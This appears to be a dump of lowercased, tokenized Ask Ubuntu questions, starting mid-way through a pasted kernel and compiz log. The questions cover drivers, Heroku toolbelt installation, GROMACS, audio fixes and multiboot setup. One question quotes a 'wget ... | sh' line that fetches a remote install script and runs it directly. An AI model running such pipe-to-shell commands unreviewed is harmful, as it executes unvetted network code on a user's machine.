0xd00223/0x840300/0x122c00 , board id : 1760 , fw id : 1211538 [ 4.000476 ] input : synps/2 synaptics touchpad as /devices/platform/i8042/serio2/input/input13 [ 4.088299 ] /dev/vmmon [ 1043 ] : module vmmon : registered with major=10 minor=165 [ 4.088303 ] /dev/vmmon [ 1043 ] : module vmmon : initialized [ 4.098681 ] guest personality initialized and is inactive [ 4.098724 ] vmci host device registered ( name=vmci , major=10 , minor=56 ) [ 4.098726 ] initialized host personality [ 4.117388 ] net : registered protocol family 40 [ 4.497689 ] init : udev-fallback-graphics main process ( 1257 ) terminated with status 1 [ 4.722821 ] acpi warning : \_sb_.pci0.peg0.pegp._dsm : argument # 4 type mismatch - found [ buffer ] , acpi requires [ package ] ( 20130517/nsarguments-95 ) [ 4.722853 ] acpi warning : \_sb_.pci0.peg0.pegp._dsm : argument # 4 type mismatch - found [ buffer ] , acpi requires [ package ] ( 20130517/nsarguments-95 ) [ 4.722867 ] acpi warning : \_sb_.pci0.peg0.pegp._dsm : argument # 4 type mismatch - found [ buffer ] , acpi requires [ package ] ( 20130517/nsarguments-95 ) [ 4.722887 ] acpi warning : \_sb_.pci0.peg0.pegp._dsm : argument # 4 type mismatch - found [ buffer ] , acpi requires [ package ] ( 20130517/nsarguments-95 ) [ 4.722899 ] acpi warning : \_sb_.pci0.peg0.pegp._dsm : argument # 4 type mismatch - found [ buffer ] , acpi requires [ package ] ( 20130517/nsarguments-95 ) [ 4.722919 ] acpi warning : \_sb_.pci0.peg0.pegp._dsm : argument # 4 type mismatch - found [ buffer ] , acpi requires [ package ] ( 20130517/nsarguments-95 ) [ 4.722932 ] acpi warning : \_sb_.pci0.peg0.pegp._dsm : argument # 4 type mismatch - found [ buffer ] , acpi requires [ package ] ( 20130517/nsarguments-95 ) [ 4.722945 ] acpi warning : \_sb_.pci0.peg0.pegp._dsm : argument # 4 type mismatch - found [ buffer ] , acpi requires [ package ] ( 20130517/nsarguments-95 ) [ 4.759915 ] /dev/vmnet : open called by pid 1305 ( vmnet-netifup ) [ 4.759920 ] /dev/vmnet : hub 1 does not exist , allocating memory . [ 4.759929 ] /dev/vmnet : port on hub 1 successfully opened [ 4.769810 ] /dev/vmnet : open called by pid 1307 ( vmnet-dhcpd ) [ 4.769818 ] /dev/vmnet : port on hub 1 successfully opened [ 4.771921 ] /dev/vmnet : open called by pid 1316 ( vmnet-natd ) [ 4.771925 ] /dev/vmnet : hub 8 does not exist , allocating memory . [ 4.771934 ] /dev/vmnet : port on hub 8 successfully opened [ 4.773045 ] /dev/vmnet : open called by pid 1317 ( vmnet-netifup ) [ 4.773050 ] /dev/vmnet : port on hub 8 successfully opened [ 4.782284 ] /dev/vmnet : open called by pid 1319 ( vmnet-dhcpd ) [ 4.782290 ] /dev/vmnet : port on hub 8 successfully opened [ 4.897915 ] acpi warning : \_sb_.pci0.peg0.pegp._dsm : argument # 4 type mismatch - found [ buffer ] , acpi requires [ package ] ( 20130517/nsarguments-95 ) [ 4.897976 ] acpi warning : \_sb_.pci0.peg0.pegp._dsm : argument # 4 type mismatch - found [ buffer ] , acpi requires [ package ] ( 20130517/nsarguments-95 ) [ 5.096877 ] wlan0 : authenticate with 60:33:4b : e3 : af:7f [ 5.104826 ] wlan0 : send auth to 60:33:4b : e3 : af:7f ( try 1/3 ) [ 5.107329 ] wlan0 : authenticated [ 5.109693 ] wlan0 : associate with 60:33:4b : e3 : af:7f ( try 1/3 ) [ 5.114879 ] wlan0 : rx assocresp from 60:33:4b : e3 : af:7f ( capab=0x1431 status=0 aid=3 ) [ 5.121450 ] wlan0 : associated [ 5.121476 ] ipv6 : addrconf ( netdev_change ) : wlan0 : link becomes ready [ 5.121531 ] cfg80211 : calling crda for country : us [ 5.123033 ] cfg80211 : regulatory domain changed to country : us [ 5.123035 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) [ 5.123037 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2700 mbm ) [ 5.123038 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 1700 mbm ) [ 5.123038 ] cfg80211 : ( 5250000 khz - 5330000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 5.123039 ] cfg80211 : ( 5490000 khz - 5600000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 5.123040 ] cfg80211 : ( 5650000 khz - 5710000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 5.123041 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 3000 mbm ) [ 5.123042 ] cfg80211 : ( 57240000 khz - 63720000 khz @ 2160000 khz ) , ( n/a , 4000 mbm ) [ 5.180176 ] /dev/vmnet : open called by pid 1234 ( vmnet-bridge ) [ 5.180185 ] /dev/vmnet : hub 0 does not exist , allocating memory . [ 5.180194 ] /dev/vmnet : port on hub 0 successfully opened [ 5.180202 ] bridge-wlan0 : device is wireless , enabling smac [ 5.180203 ] bridge-wlan0 : up [ 5.180206 ] bridge-wlan0 : attached [ 5.209995 ] acpi warning : \_sb_.pci0.peg0.pegp._dsm : argument # 4 type mismatch - found [ buffer ] , acpi requires [ package ] ( 20130517/nsarguments-95 ) [ 5.380145 ] userif-2 : sent link down event . [ 5.380147 ] userif-2 : sent link up event . [ 5.446001 ] net : unregistered protocol family 40 [ 5.629704 ] userif-2 : sent link down event . [ 5.629707 ] userif-2 : sent link up event . [ 6.094603 ] /dev/vmmon [ 1454 ] : module vmmon : unloaded [ 6.128544 ] bridge-wlan0 : disabling the bridge [ 6.150558 ] bridge-wlan0 : down [ 6.150562 ] bridge-wlan0 : detached [ 9.967149 ] /dev/vmmon [ 2870 ] : module vmmon : registered with major=10 minor=165 [ 9.967153 ] /dev/vmmon [ 2870 ] : module vmmon : initialized [ 9.978639 ] guest personality initialized and is inactive [ 9.978674 ] vmci host device registered ( name=vmci , major=10 , minor=56 ) [ 9.978675 ] initialized host personality [ 9.994455 ] net : registered protocol family 40 [ 10.047749 ] /dev/vmnet : open called by pid 2951 ( vmnet-bridge ) [ 10.047754 ] /dev/vmnet : hub 0 does not exist , allocating memory . [ 10.047762 ] /dev/vmnet : port on hub 0 successfully opened [ 10.047767 ] bridge-wlan0 : device is wireless , enabling smac [ 10.047768 ] bridge-wlan0 : up [ 10.047770 ] bridge-wlan0 : attached [ 11.055541 ] /dev/vmnet : open called by pid 2958 ( vmnet-netifup ) [ 11.055548 ] /dev/vmnet : hub 1 does not exist , allocating memory . [ 11.055559 ] /dev/vmnet : port on hub 1 successfully opened [ 11.070811 ] /dev/vmnet : open called by pid 2960 ( vmnet-dhcpd ) [ 11.070821 ] /dev/vmnet : port on hub 1 successfully opened [ 11.073559 ] /dev/vmnet : open called by pid 2969 ( vmnet-natd ) [ 11.073565 ] /dev/vmnet : hub 8 does not exist , allocating memory . [ 11.073576 ] /dev/vmnet : port on hub 8 successfully opened [ 11.074099 ] userif-3 : sent link down event . [ 11.074101 ] userif-3 : sent link up event . [ 11.074838 ] /dev/vmnet : open called by pid 2970 ( vmnet-netifup ) [ 11.074843 ] /dev/vmnet : port on hub 8 successfully opened [ 11.088819 ] /dev/vmnet : open called by pid 2972 ( vmnet-dhcpd ) [ 11.088829 ] /dev/vmnet : port on hub 8 successfully opened [ 12.110889 ] deprecated_sysctl_warning : 171 callbacks suppressed [ 12.110892 ] warning : process `vmware-hostd ' used the deprecated sysctl system call with 1.1 . [ 12.921259 ] init : plymouth-stop pre-start process ( 3235 ) terminated with status 1 [ 20.768249 ] acpi warning : \_sb_.pci0.peg0.pegp._dsm : argument # 4 type mismatch - found [ buffer ] , acpi requires [ package ] ( 20130517/nsarguments-95 ) [ 20.768281 ] acpi warning : \_sb_.pci0.peg0.pegp._dsm : argument # 4 type mismatch - found [ buffer ] , acpi requires [ package ] ( 20130517/nsarguments-95 ) [ 20.768294 ] acpi warning : \_sb_.pci0.peg0.pegp._dsm : argument # 4 type mismatch - found [ buffer ] , acpi requires [ package ] ( 20130517/nsarguments-95 ) [ 20.768314 ] acpi warning : \_sb_.pci0.peg0.pegp._dsm : argument # 4 type mismatch - found [ buffer ] , acpi requires [ package ] ( 20130517/nsarguments-95 ) [ 20.768327 ] acpi warning : \_sb_.pci0.peg0.pegp._dsm : argument # 4 type mismatch - found [ buffer ] , acpi requires [ package ] ( 20130517/nsarguments-95 ) [ 20.768346 ] acpi warning : \_sb_.pci0.peg0.pegp._dsm : argument # 4 type mismatch - found [ buffer ] , acpi requires [ package ] ( 20130517/nsarguments-95 ) [ 20.768358 ] acpi warning : \_sb_.pci0.peg0.pegp._dsm : argument # 4 type mismatch - found [ buffer ] , acpi requires [ package ] ( 20130517/nsarguments-95 ) [ 20.768370 ] acpi warning : \_sb_.pci0.peg0.pegp._dsm : argument # 4 type mismatch - found [ buffer ] , acpi requires [ package ] ( 20130517/nsarguments-95 ) [ 20.834699 ] acpi warning : \_sb_.pci0.peg0.pegp._dsm : argument # 4 type mismatch - found [ buffer ] , acpi requires [ package ] ( 20130517/nsarguments-95 ) [ 20.834734 ] acpi warning : \_sb_.pci0.peg0.pegp._dsm : argument # 4 type mismatch - found [ buffer ] , acpi requires [ package ] ( 20130517/nsarguments-95 ) [ 20.877996 ] acpi warning : \_sb_.pci0.peg0.pegp._dsm : argument # 4 type mismatch - found [ buffer ] , acpi requires [ package ] ( 20130517/nsarguments-95 ) [ 32.154757 ] acpi warning : \_sb_.pci0.peg0.pegp._dsm : argument # 4 type mismatch - found [ buffer ] , acpi requires [ package ] ( 20130517/nsarguments-95 ) [ 32.154790 ] acpi warning : \_sb_.pci0.peg0.pegp._dsm : argument # 4 type mismatch - found [ buffer ] , acpi requires [ package ] ( 20130517/nsarguments-95 ) [ 32.154806 ] acpi warning : \_sb_.pci0.peg0.pegp._dsm : argument # 4 type mismatch - found [ buffer ] , acpi requires [ package ] ( 20130517/nsarguments-95 ) [ 32.154827 ] acpi warning : \_sb_.pci0.peg0.pegp._dsm : argument # 4 type mismatch - found [ buffer ] , acpi requires [ package ] ( 20130517/nsarguments-95 ) [ 32.154842 ] acpi warning : \_sb_.pci0.peg0.pegp._dsm : argument # 4 type mismatch - found [ buffer ] , acpi requires [ package ] ( 20130517/nsarguments-95 ) [ 32.154864 ] acpi warning : \_sb_.pci0.peg0.pegp._dsm : argument # 4 type mismatch - found [ buffer ] , acpi requires [ package ] ( 20130517/nsarguments-95 ) [ 32.154878 ] acpi warning : \_sb_.pci0.peg0.pegp._dsm : argument # 4 type mismatch - found [ buffer ] , acpi requires [ package ] ( 20130517/nsarguments-95 ) [ 32.154893 ] acpi warning : \_sb_.pci0.peg0.pegp._dsm : argument # 4 type mismatch - found [ buffer ] , acpi requires [ package ] ( 20130517/nsarguments-95 ) [ 32.220912 ] acpi warning : \_sb_.pci0.peg0.pegp._dsm : argument # 4 type mismatch - found [ buffer ] , acpi requires [ package ] ( 20130517/nsarguments-95 ) [ 32.220949 ] acpi warning : \_sb_.pci0.peg0.pegp._dsm : argument # 4 type mismatch - found [ buffer ] , acpi requires [ package ] ( 20130517/nsarguments-95 ) [ 32.263661 ] acpi warning : \_sb_.pci0.peg0.pegp._dsm : argument # 4 type mismatch - found [ buffer ] , acpi requires [ package ] ( 20130517/nsarguments-95 ) [ 39.904510 ] acpi warning : \_sb_.pci0.peg0.pegp._dsm : argument # 4 type mismatch - found [ buffer ] , acpi requires [ package ] ( 20130517/nsarguments-95 ) [ 39.904542 ] acpi warning : \_sb_.pci0.peg0.pegp._dsm : argument # 4 type mismatch - found [ buffer ] , acpi requires [ package ] ( 20130517/nsarguments-95 ) [ 39.904555 ] acpi warning : \_sb_.pci0.peg0.pegp._dsm : argument # 4 type mismatch - found [ buffer ] , acpi requires [ package ] ( 20130517/nsarguments-95 ) [ 39.904575 ] acpi warning : \_sb_.pci0.peg0.pegp._dsm : argument # 4 type mismatch - found [ buffer ] , acpi requires [ package ] ( 20130517/nsarguments-95 ) [ 39.904588 ] acpi warning : \_sb_.pci0.peg0.pegp._dsm : argument # 4 type mismatch - found [ buffer ] , acpi requires [ package ] ( 20130517/nsarguments-95 ) [ 39.904607 ] acpi warning : \_sb_.pci0.peg0.pegp._dsm : argument # 4 type mismatch - found [ buffer ] , acpi requires [ package ] ( 20130517/nsarguments-95 ) [ 39.904619 ] acpi warning : \_sb_.pci0.peg0.pegp._dsm : argument # 4 type mismatch - found [ buffer ] , acpi requires [ package ] ( 20130517/nsarguments-95 ) [ 39.904631 ] acpi warning : \_sb_.pci0.peg0.pegp._dsm : argument # 4 type mismatch - found [ buffer ] , acpi requires [ package ] ( 20130517/nsarguments-95 ) [ 39.970675 ] acpi warning : \_sb_.pci0.peg0.pegp._dsm : argument # 4 type mismatch - found [ buffer ] , acpi requires [ package ] ( 20130517/nsarguments-95 ) [ 39.970710 ] acpi warning : \_sb_.pci0.peg0.pegp._dsm : argument # 4 type mismatch - found [ buffer ] , acpi requires [ package ] ( 20130517/nsarguments-95 ) [ 40.013403 ] acpi warning : \_sb_.pci0.peg0.pegp._dsm : argument # 4 type mismatch - found [ buffer ] , acpi requires [ package ] ( 20130517/nsarguments-95 ) [ 55.580057 ] type=1400 audit ( 1389711749.300:68 ) : apparmor= '' denied '' operation= '' open '' parent=4264 profile= '' /usr/lib/lightdm/lightdm/lightdm-guest-session-wrapper '' name= '' /proc/driver/nvidia/params '' pid=4280 comm= '' unity_support_t '' requested_mask= '' r '' denied_mask= '' r '' fsuid=118 ouid=0 [ 55.580128 ] type=1400 audit ( 1389711749.300:69 ) : apparmor= '' denied '' operation= '' open '' parent=4264 profile= '' /usr/lib/lightdm/lightdm/lightdm-guest-session-wrapper '' name= '' /proc/driver/nvidia/params '' pid=4280 comm= '' unity_support_t '' requested_mask= '' r '' denied_mask= '' r '' fsuid=118 ouid=0 [ 55.580288 ] type=1400 audit ( 1389711749.300:70 ) : apparmor= '' denied '' operation= '' open '' parent=4264 profile= '' /usr/lib/lightdm/lightdm/lightdm-guest-session-wrapper '' name= '' /proc/driver/nvidia/params '' pid=4280 comm= '' unity_support_t '' requested_mask= '' r '' denied_mask= '' r '' fsuid=118 ouid=0 [ 55.600733 ] type=1400 audit ( 1389711749.320:71 ) : apparmor= '' denied '' operation= '' open '' parent=4264 profile= '' /usr/lib/lightdm/lightdm/lightdm-guest-session-wrapper '' name= '' /proc/driver/nvidia/params '' pid=4280 comm= '' unity_support_t '' requested_mask= '' r '' denied_mask= '' r '' fsuid=118 ouid=0 [ 55.600860 ] type=1400 audit ( 1389711749.320:72 ) : apparmor= '' denied '' operation= '' open '' parent=4264 profile= '' /usr/lib/lightdm/lightdm/lightdm-guest-session-wrapper '' name= '' /proc/driver/nvidia/params '' pid=4280 comm= '' unity_support_t '' requested_mask= '' r '' denied_mask= '' r '' fsuid=118 ouid=0 [ 55.905063 ] type=1400 audit ( 1389711749.624:73 ) : apparmor= '' denied '' operation= '' mount '' info= '' failed mntpnt match '' error=-13 parent=4264 profile= '' /usr/lib/lightdm/lightdm/lightdm-guest-session-wrapper '' name= '' /run/user/118/gvfs/ '' pid=4442 comm= '' gvfsd-fuse '' fstype= '' fuse.gvfsd-fuse '' srcname= '' gvfsd-fuse '' flags= '' rw , nosuid , nodev '' [ 55.933170 ] type=1400 audit ( 1389711749.652:74 ) : apparmor= '' denied '' operation= '' open '' parent=4432 profile= '' /usr/lib/lightdm/lightdm/lightdm-guest-session-wrapper '' name= '' /proc/driver/nvidia/params '' pid=4448 comm= '' gnome-session-c '' requested_mask= '' r '' denied_mask= '' r '' fsuid=118 ouid=0 [ 55.933267 ] type=1400 audit ( 1389711749.652:75 ) : apparmor= '' denied '' operation= '' open '' parent=4432 profile= '' /usr/lib/lightdm/lightdm/lightdm-guest-session-wrapper '' name= '' /proc/driver/nvidia/params '' pid=4448 comm= '' gnome-session-c '' requested_mask= '' r '' denied_mask= '' r '' fsuid=118 ouid=0 [ 55.933551 ] type=1400 audit ( 1389711749.652:76 ) : apparmor= '' denied '' operation= '' open '' parent=4432 profile= '' /usr/lib/lightdm/lightdm/lightdm-guest-session-wrapper '' name= '' /proc/driver/nvidia/params '' pid=4448 comm= '' gnome-session-c '' requested_mask= '' r '' denied_mask= '' r '' fsuid=118 ouid=0 [ 63.498343 ] audit_printk_skb : 105 callbacks suppressed [ 63.498345 ] type=1400 audit ( 1389711757.216:112 ) : apparmor= '' denied '' operation= '' open '' parent=4264 profile= '' /usr/lib/lightdm/lightdm/lightdm-guest-session-wrapper '' name= '' /proc/4250/stat '' pid=4375 comm= '' bamfdaemon '' requested_mask= '' r '' denied_mask= '' r '' fsuid=118 ouid=0 [ 63.498362 ] type=1400 audit ( 1389711757.216:113 ) : apparmor= '' denied '' operation= '' open '' parent=4264 profile= '' /usr/lib/lightdm/lightdm/lightdm-guest-session-wrapper '' name= '' /proc/1288/stat '' pid=4375 comm= '' bamfdaemon '' requested_mask= '' r '' denied_mask= '' r '' fsuid=118 ouid=0 [ 66.149428 ] acpi warning : \_sb_.pci0.peg0.pegp._dsm : argument # 4 type mismatch - found [ buffer ] , acpi requires [ package ] ( 20130517/nsarguments-95 ) [ 66.149461 ] acpi warning : \_sb_.pci0.peg0.pegp._dsm : argument # 4 type mismatch - found [ buffer ] , acpi requires [ package ] ( 20130517/nsarguments-95 ) [ 66.149477 ] acpi warning : \_sb_.pci0.peg0.pegp._dsm : argument # 4 type mismatch - found [ buffer ] , acpi requires [ package ] ( 20130517/nsarguments-95 ) [ 66.149525 ] acpi warning : \_sb_.pci0.peg0.pegp._dsm : argument # 4 type mismatch - found [ buffer ] , acpi requires [ package ] ( 20130517/nsarguments-95 ) [ 66.149577 ] acpi warning : \_sb_.pci0.peg0.pegp._dsm : argument # 4 type mismatch - found [ buffer ] , acpi requires [ package ] ( 20130517/nsarguments-95 ) [ 66.149627 ] acpi warning : \_sb_.pci0.peg0.pegp._dsm : argument # 4 type mismatch - found [ buffer ] , acpi requires [ package ] ( 20130517/nsarguments-95 ) [ 66.149641 ] acpi warning : \_sb_.pci0.peg0.pegp._dsm : argument # 4 type mismatch - found [ buffer ] , acpi requires [ package ] ( 20130517/nsarguments-95 ) [ 66.149665 ] acpi warning : \_sb_.pci0.peg0.pegp._dsm : argument # 4 type mismatch - found [ buffer ] , acpi requires [ package ] ( 20130517/nsarguments-95 ) [ 66.215695 ] acpi warning : \_sb_.pci0.peg0.pegp._dsm : argument # 4 type mismatch - found [ buffer ] , acpi requires [ package ] ( 20130517/nsarguments-95 ) [ 66.215736 ] acpi warning : \_sb_.pci0.peg0.pegp._dsm : argument # 4 type mismatch - found [ buffer ] , acpi requires [ package ] ( 20130517/nsarguments-95 ) [ 66.259105 ] acpi warning : \_sb_.pci0.peg0.pegp._dsm : argument # 4 type mismatch - found [ buffer ] , acpi requires [ package ] ( 20130517/nsarguments-95 ) unity & & compiz -- replace output : michael @ michael-bonobo-extreme : ~ $ unity & & compiz -- replace compiz ( core ) - info : loading plugin : core compiz ( core ) - info : starting plugin : core unity-panel-service : no process found compiz ( core ) - info : loading plugin : ccp compiz ( core ) - info : starting plugin : ccp compizconfig - info : backend : gsettings compizconfig - info : integration : true compizconfig - info : profile : unity compiz ( core ) - info : loading plugin : composite compiz ( core ) - info : starting plugin : composite compiz ( core ) - info : loading plugin : opengl compiz ( core ) - info : starting plugin : opengl nvidia : api mismatch : the nvidia kernel module has version 319.32 , but this nvidia driver component has version 319.60 . please make sure that the kernel module and all nvidia driver components have the same version . compiz ( core ) - info : loading plugin : decor compiz ( core ) - info : starting plugin : decor compiz ( core ) - info : loading plugin : copytex compiz ( core ) - info : starting plugin : copytex compiz ( core ) - info : loading plugin : resize compiz ( core ) - info : starting plugin : resize compiz ( core ) - info : loading plugin : gnomecompat compiz ( core ) - info : starting plugin : gnomecompat compiz ( core ) - info : loading plugin : snap compiz ( core ) - info : starting plugin : snap compiz ( core ) - info : loading plugin : regex compiz ( core ) - info : starting plugin : regex compiz ( core ) - info : loading plugin : commands compiz ( core ) - info : starting plugin : commands compiz ( core ) - info : loading plugin : imgpng compiz ( core ) - info : starting plugin : imgpng compiz ( core ) - info : loading plugin : place compiz ( core ) - info : starting plugin : place compiz ( core ) - info : loading plugin : wall compiz ( core ) - info : starting plugin : wall compiz ( core ) - info : loading plugin : vpswitch compiz ( core ) - info : starting plugin : vpswitch compiz ( core ) - info : loading plugin : move compiz ( core ) - info : starting plugin : move compiz ( core ) - info : loading plugin : compiztoolbox compiz ( core ) - info : starting plugin : compiztoolbox compiz ( core ) - info : loading plugin : session compiz ( core ) - info : starting plugin : session compiz ( core ) - info : loading plugin : grid compiz ( core ) - info : starting plugin : grid compiz ( core ) - info : loading plugin : mousepoll compiz ( core ) - info : starting plugin : mousepoll compiz ( core ) - info : loading plugin : animation compiz ( core ) - info : starting plugin : animation compiz ( core ) - info : loading plugin : expo compiz ( core ) - info : starting plugin : expo compiz ( core ) - info : loading plugin : unitymtgrabhandles compiz ( core ) - info : starting plugin : unitymtgrabhandles compiz ( core ) - info : loading plugin : ezoom compiz ( core ) - info : starting plugin : ezoom compiz ( core ) - info : loading plugin : workarounds compiz ( core ) - info : starting plugin : workarounds compiz ( core ) - info : loading plugin : fade compiz ( core ) - info : starting plugin : fade compiz ( core ) - info : loading plugin : scale compiz ( core ) - info : starting plugin : scale compiz ( core ) - info : loading plugin : unityshell compiz ( core ) - info : starting plugin : unityshell warn 2014-01-14 10:22:03 unity.glib.dbus.server glibdbusserver.cpp:586 ca n't register object 'com.canonical.autopilot.introspection ' yet as we do n't have a connection , waiting for it ... warn 2014-01-14 10:22:03 unity.glib.dbus.server glibdbusserver.cpp:586 ca n't register object 'com.canonical.unity.debug.logging ' yet as we do n't have a connection , waiting for it ... warn 2014-01-14 10:22:03 xim.controller ximcontroller.cpp:90 ibus natively supported . warn 2014-01-14 10:22:03 unity.libindicator < unknown > :0 desktop file '/usr/share/applications/terminator.desktop ' is using a deprecated format for its actions that will be dropped soon . warn 2014-01-14 10:22:03 unity.glib.dbus.server glibdbusserver.cpp:586 ca n't register object 'com.canonical.unity.launcher ' yet as we do n't have a connection , waiting for it ... warn 2014-01-14 10:22:03 unity.glib.dbus.server glibdbusserver.cpp:586 ca n't register object 'com.canonical.unity.dash ' yet as we do n't have a connection , waiting for it ... warn 2014-01-14 10:22:03 unity.glib.dbus.server glibdbusserver.cpp:586 ca n't register object 'org.gnome.sessionmanager.endsessiondialog ' yet as we do n't have a connection , waiting for it ... compiz ( decor ) - warn : no default decoration found , placement will not be correct compiz ( decor ) - warn : no default decoration found , placement will not be correct compiz ( decor ) - warn : no default decoration found , placement will not be correct compiz ( decor ) - warn : no default decoration found , placement will not be correct compiz ( decor ) - warn : no default decoration found , placement will not be correct compiz ( decor ) - warn : no default decoration found , placement will not be correct compiz ( decor ) - warn : no default decoration found , placement will not be correct compiz ( decor ) - warn : no default decoration found , placement will not be correct compiz ( decor ) - warn : no default decoration found , placement will not be correct compiz ( decor ) - warn : no default decoration found , placement will not be correct unity command hangs there and does n't do anything . if i ctrl+c it breaks my ui and i need to reboot .
405385	joing windows clients in ubuntu server	1.how to configure ubuntu server as primary domain controller and how to join ( windows desktops which is running windows 7 ultimate edition ) in the primary domain controller ? 2.if the windows desktop is able to join ubuntu server what features will be available for windows desktop ?
405390	heroku toolbelt install - header over 360 characters	i am trying to install the heroku toolbelt on my ubuntu 12.04 . i am getting the following errors when i run the script from the heroku website : $ wget -qo- https : //toolbelt.heroku.com/install-ubuntu.sh | sh w : failed to fetch http : //toolbelt.herokuapp.com/ubuntu/./release.gpg got a single header line over 360 chars w : failed to fetch http : //toolbelt.heroku.com/ubuntu/./release.gpg got a single header line over 360 chars [ ip : 54.225.184.218 80 ] w : failed to fetch http : //toolbelt.heroku.com/ubuntu/./packages got a single header line over 360 chars [ ip : 54.225.184.218 80 ] w : failed to fetch http : //toolbelt.heroku.com/ubuntu/./en_gb got a single header line over 360 chars [ ip : 54.225.184.218 80 ] w : failed to fetch http : //toolbelt.heroku.com/ubuntu/./en got a single header line over 360 chars [ ip : 54.225.184.218 80 ] w : failed to fetch http : //toolbelt.herokuapp.com/ubuntu/./sources got a single header line over 360 chars w : failed to fetch http : //toolbelt.herokuapp.com/ubuntu/./packages got a single header line over 360 chars w : failed to fetch http : //toolbelt.herokuapp.com/ubuntu/./en_gb got a single header line over 360 chars w : failed to fetch http : //toolbelt.herokuapp.com/ubuntu/./en got a single header line over 360 chars e : some index files failed to download . they have been ignored , or old ones used instead . i have searched through here and found similar questions , and tried the fix in the question with no luck . open to all ideas on fixing this issue !
405393	how to install gromacs 4.5.5 and upgrade to gromacs 4.6.3 ?	so , i tried to install gromacs 4.6.3 and 4.6.5. but when i tried it says gromacs not found . and `` the program `` genbox '' is currently not installed . you can install it by typing : sudo apt-get install gromacs '' so i did that . what i have now is gromacs 4.5.5 . i want 4.6.3 or 4.6.5 how can i delete the 4.5.5 and have the 4.6.3 ? thanks
405395	ubuntu precise with raring kernel , how to create deb ? precise or raring ?	i wish to build a deb package ( in order to install latest amd proprietary drivers for my troublesome gfx card ) , given i have ubuntu 12.04.4 lts precise , but with the raring kernel : linux 3.8.0-35-generic , how do i do this , is it : sh amd-driver-installer-catalyst.run -- buildpkg ubuntu/precise or sh amd-driver-installer-catalyst.run -- buildpkg ubuntu/raring ?
405402	how can i sync/backup iphone 4s ( ios 7 ) with ubuntu 12.04 lts	i have recently upgraded my iphone 4s to ios 7 . i have ubuntu 12.04 lts installed on all my systems and due to security reasons it is not safe to sync and backup my iphone on other 's windows based systems with itunes . my question , is there any alternative for itunes on ubuntu or any mechanism i can use to both backup and sync my phone with my linux system ? methods i can came across like free mp3 app worked with ios 6 only and could only sync music . any help appreciated : ) ) thanks in advance
405403	x configuration	i seem to be at a dead end regarding my desktop and display drivers . long story short , i bought a vga to hdmi converter for an old external hp monitor ( hp le1901w ) . i hooked it up through my hdmi port and it was working fine for a few days . but then i closed the lid of my laptop , and the machine went into hibernation . since then , the external would n't go on at all , nor would it be detected in the display properties in ubuntu settings . i then proceeded to scratch around online , and got the sharp idea of installing the proper nvidia drivers for my nvidia geforce gt 740m . i did a whole pile of things , like apt-get nvidia-current , jockey-text updates , and more without any luck . i was still at a point where i could revert these changes , and boot back into x without problems , but then i found a site that had a link to a .run driver package installer on the nvidia web site . after this install i was no longer able to revert back to previous configuration . i even uninstalled it , and still , no fix . so basically , my problem is as follows ... i 've disconnected the hdmi display , and all i 'm really trying to do is to get my desktop to work properly again just on my laptop display . when i boot into x , the logon screen comes up fine . when i logon it just goes into a blank black screen with a mouse pointer . i can press ctrl+alt+t to get a terminal window , without a titlebar or anything to resize or move the window around . from there i can launch apps like chromium-browser , one at a time . if i run nautilus , my desktop wallpaper comes back with all the icons on my desktop , but no taskbar , or unity menu or ciaro dock loads . so that 's where i am now , and i am out of options . i would really just like to get the desktop environment back to where it was . the external monitor issue i can do some more research on at a later stage , but right now i need it up and running . a few details on my specs : laptop : hp envy 17 notebook cpu : intel i7-4700mq ( 2.4ghz ) gpu : nvidia geforce gt740m ( 2gb ) os : ubuntu 13.10 ( saucy ) 3.11.0-15-generic i was really hoping someone could possibly point me into the right direction .
405408	subwoofer not working in 13.10 on asus n56dp	currently have an asus n56dp . using an older answer i could get the subwoofer to work under 12.04 but after an upgrade to 12.10 that method stopped working . lspci|grep -i audio 00:01.1 audio device : advanced micro devices , inc. [ amd/ati ] trinity hdmi audio controller 00:14.2 audio device : advanced micro devices , inc. [ amd ] fch azalia controller ( rev 01 ) lsusb bus 002 device 002 : id 1bcf:2883 sunplus innovation technology inc . bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 008 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 007 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 006 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 005 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub a bit more info . the fix for the n56v series worked under ubuntu 12.04 to get the subwoofer working but was a bit wonky . the fix was the one that added these lines to /etc/rc.local : echo 0x1e 0x99130112 > /sys/class/sound/hwc0d0/user_pin_configs echo 1 > /sys/class/sound/hwc0d0/reconfig and added this line to /etc/modprobe.d/alsa-base.conf : options snd-hda-intel model=asus-mode4 lastly , my 13.10 was arrived at by upgrading from 12.04 through each version to 13.10 .
405409	installing ubuntu , but not getting a install menu	i was hoping i can get some help . i installed ubuntu via usb . but when i was installing i never got the `` menu '' to run along side or delete windows and run ubuntu only . i do n't want windows on this laptop . i want to be running 13.10 ubuntu . any help would be greatly appreciated . thanks
405411	installing multiple versions of linux on grub	hey i had windows 7 ultimate installed first and then i put on it ubuntu 13.10 the space used is as follows windows 7 : 950 gb ubuntu : 24 gb swap area : 6 gb total hard disk space is 1 tb now the problemm is that iwant to install another version of linux i.e . backtrack 5r3 along with ubuntu and windows without losing data ? please let me know if adding an entry to the grub is allowed ?
